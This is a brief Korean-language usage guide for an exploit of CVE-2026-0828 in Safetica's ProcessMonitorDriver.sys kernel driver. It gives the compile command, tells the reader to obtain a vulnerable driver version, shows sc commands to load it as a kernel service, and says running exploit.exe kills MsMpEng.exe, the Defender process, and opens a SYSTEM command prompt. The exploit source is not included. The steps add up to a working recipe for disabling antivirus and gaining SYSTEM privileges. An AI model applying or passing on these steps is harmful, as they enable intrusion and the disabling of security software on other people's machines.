
CVE-2026-0828에 대한 익스플로잇으로, Safetica ProcessMonitorDriver.sys를 대상으로 프로세스를 종료하고 SYSTEM 셸을 생성합니다.
CVE-2026-0828 빌드(Build): Visual Studio 개발자 명령 프롬프트(x64 Native Tools)를 열고 코드를 컴파일합니다
: bash
cl.exe /W3 /O1 /nologo exploit.c /Fe:exploit.exe
준비: 테스트 머신에 취약한 Safetica 드라이버(ProcessMonitorDriver.sys)가 설치되어 있는지 확인합니다. 없다면 직접 구해야 합니다(예: Safetica 버전 < 11.26.19 배포판에서)
.
드라이버 로드(관리자 권한으로): 드라이버를 시스템에 로드해야 합니다. 관리자 권한의 콘솔에서 수행할 수 있습니다
: bash
sc create STProcessMonitor type= kernel binPath= "C:\full\path\to\ProcessMonitorDriver.sys" sc start STProcessMonitor
익스플로잇 실행: 이제 exploit.exe를 실행합니다. 지정된 프로세스(코드에서는 MsMpEng.exe)를 종료하고 NT AUTHORITY\SYSTEM 권한으로 새 cmd.exe 창을 엽니다.